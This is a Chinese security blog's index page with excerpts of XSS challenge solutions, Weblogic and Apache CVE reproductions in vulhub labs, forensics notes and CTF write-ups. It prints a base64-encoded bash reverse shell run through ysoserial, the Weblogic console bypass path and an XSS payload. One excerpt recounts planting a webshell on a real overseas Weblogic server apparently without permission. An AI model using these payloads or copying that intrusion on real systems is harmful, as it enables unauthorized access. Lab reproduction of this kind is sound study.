chaser's Blog

xss-demo记录

发表于 2022-03-15 分类于 XSS

靶场地址：https://xss.haozi.me/

0x00

input

1	<script>alert(1)</script>

html

1	<div><script>alert(1)</script></div>

server code

1
2
3

function render (input) {
  return '<div>' + input + '</div>'
}

阅读全文 »

记一次曲折的weblogic上传webshell

发表于 2021-11-05 分类于渗透测试

前言

因上次攻防开局拿下weblogic主机权限，但由于默认写shell路径更改导致无法进一步利用，直到快结束时才找到正确路径写入shell，但为时已晚，只得匆匆拿下几台主机草草了事。最近刚好有空就找了台境外weblogic主机练手，过程稍微有点曲折，先后经历了尝试各种路径失败，中途主机还下线了，好在第二天又重新上线，再到绕过杀软文件监控上传webshell，总算是成功了，最后把过程记录一下。

正文

利用工具检测，发现存在weblogic iiop反序列化命令执行漏洞

开局是administrator权限，权限比较高，能干的事情应该挺多的

dir看一下文件

阅读全文 »

Apache HTTP Server路径穿越漏洞（CVE-2021-41773、CVE-2021-42013）复现

发表于 2021-10-11 分类于漏洞复现

CVE-2021-41773

漏洞简介

Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.49版本中，引入了ap_normalize_path函数，导致了路径穿越漏洞。

该漏洞仅影响2.4.49版本，此外还需要在配置文件中允许访问穿越的目录，如<Directory />Require all granted</Directory>，使用默认配置的Apache HTTP Server不受影响。

在服务器开启cgi或cgid模块的情况下，该漏洞可执行任意命令。

漏洞复现

这里使用vulhub的环境，docker-compose up -d启动环境

使用自己搭建的环境时，需要修改httpd.conf文件，主要是以下内容

# 取消#注释
<IfModule !mpm_prefork_module>
	LoadModule cgid_module modules/mod_cgid.so
</IfModule>
<IfModule mpm_prefork_module>
	LoadModule cgi_module modules/mod_cgi.so
</IfModule>
...
# 修改denied为granted
<Directory />
    AllowOverride none
    Require all granted
</Directory>
...
# 取消#注释
Include conf/extra/httpd-autoindex.conf

阅读全文 »

Weblogic远程代码执行漏洞（CVE-2021-2109）复现

发表于 2021-09-30 更新于 2021-10-09 分类于漏洞复现

漏洞简介

该漏洞为Weblogic的远程代码执行漏洞，攻击者可构造恶意请求，造成JNDI注入，执行任意代码，从而控制服务器。

影响版本

WebLogic 10.3.6.0.0
WebLogic 12.1.3.0.0
WebLogic 12.2.1.3.0
WebLogic 12.2.1.4.0
WebLogic 14.1.1.0.0

漏洞复现

使用vulhub CVE-2020-14882搭建漏洞环境，docker-compose up -d开启weblogic 12.2.1.3服务器

1、启动ldap监听

使用JNDI注入工具开启ldap监听

可以用：https://github.com/welk1n/JNDI-Injection-Exploit

或者这个：https://github.com/feihong-cs/JNDIExploit

两者区别在于feihong-cs大佬的项目可以在http header中设置cmd参数来回显，如下图：

阅读全文 »

Weblogic console未授权远程命令执行（CVE-2020-14882,CVE-2020-14883）复现

发表于 2021-09-30 分类于漏洞复现

漏洞简介

CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台，CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链，可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。

影响版本

WebLogic 10.3.6.0.0
WebLogic 12.1.3.0.0
WebLogic 12.2.1.3.0
WebLogic 12.2.1.4.0
WebLogic 14.1.1.0.0

漏洞复现

使用vulhub搭建漏洞环境，docker-compose up -d开启weblogic 12.2.1.3服务器

Weblogic console权限绕过漏洞(CVE-2020-14882)

漏洞环境url拼接/console/css/%252e%252e%252fconsole.portal，即可直接访问console后台

搭的环境和之前遇到的环境都遇到一个问题，访问上述url后会重定向到/console/%2e%2e%2fconsole.portal?_nfpb=true&_pageLabel=HomePage1，显示404界面，并未进入后台，这时再将url路径改为/console/css/%252e%252e%252fconsole.portal，即可进入后台

阅读全文 »

WebLogic远程代码执行漏洞（CVE-2018-3191）复现

发表于 2021-09-29 更新于 2021-09-30 分类于漏洞复现

今天测试，遇到了这个漏洞，vulmap扫到了这个漏洞，另一个weblogic漏洞利用工具却没扫到，就想着来复现一下这个漏洞，没想到还踩了个大坑，刚好水篇文章记录一下…

漏洞简介

WebLogic远程代码执行漏洞(CVE-2018-3191)允许未经身份验证的攻击者通过T3协议网络访问并破坏易受攻击的WebLogic Server，成功的漏洞利用可导致WebLogic Server被攻击者接管，从而造成远程代码执行。

影响版本

WebLogic 10.3.6.0
WebLogic 12.1.3.0
WebLogic 12.2.1.2
WebLogic 12.2.1.3

漏洞复现

使用vulhub CVE-2018-2628搭建漏洞环境，docker-compose up -d开启weblogic 10.3.6.0服务器

1、开启RMI监听

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1097 CommonsCollections1 "/bin/bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xLjEuMjA0LzU1NTUgMD4mMQ==}|{base64,-d}|{/bin/bash,-i}"

YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xLjEuMjA0LzU1NTUgMD4mMQ==解码后：bash -i >& /dev/tcp/10.1.1.204/5555 0>&1，base64编码避免反弹shell中特殊符号被Runtime.getRuntime().exec()转义

阅读全文 »

内存取证

发表于 2021-09-16 分类于内存取证

最近的CTF遇到了内存取证题，之前没有系统学习过，赛后来补一波笔记

工具

Volatility简介

Volatility是一款开源的，基于Python开发的内存取证工具集，可以分析内存中的各种数据。Volatility支持对32位或64位Windows、Linux、Mac、Android操作系统的RAM数据进行提取与分析。

安装

kali自带这个工具，但我的kali 2019.4没有(可能是因为mini安装)，因此自己在windows上折腾了一下安装，推荐下载官方打包的可执行文件版，源码版的虽然也能用，但是需要自己安装第三方依赖库，distorm3这个依赖库安装起来比较麻烦。

阅读全文 »

ictf网络安全内生试验场wp

发表于 2021-03-19 更新于 2021-03-28 分类于 CTF

best_language1

题目是代码审计

<?php
    error_reporting(0);  
    highlight_file(__FILE__);
    include('secret_key.php');
    if(!empty($_GET["name"])) {
    $arr = array($_GET["name"],$secret_key);
    $data = "Welcome my friend %s";
    foreach ($arr as $k => $v) {
        $data = sprintf($data,$v);
    }
    echo $data;
    }

    if( ($secret_key) === $_GET['key']){
        echo "<br>you get the key<br>";
        $first='aa';
        $ccc='amdin';
        $i=1;
        foreach($_GET as $key => $value) {
                if($i===1)
                {
                    $i++;
                    $$key = $value;
                }
                else{break;}
        }
        if($first==="u")
        {
            echo "<br>shi fu 666<br>";
            $file='phpinfo.php';
            $func = $_GET['function'];
            call_user_func($func,$_GET);
            if($ccc==="F1ag")
            {
                echo "<br>tqltqltqltqltql<br>";
                require('class.php');
                include($file);
            }
        }
        else
        {
            echo "Can you hack me?<br>";
        }
    }

阅读全文 »

BMZCTF WP

发表于 2021-03-19 更新于 2021-03-28 分类于渗透测试

综合渗透

BMZ_Market

打开环境

阅读全文 »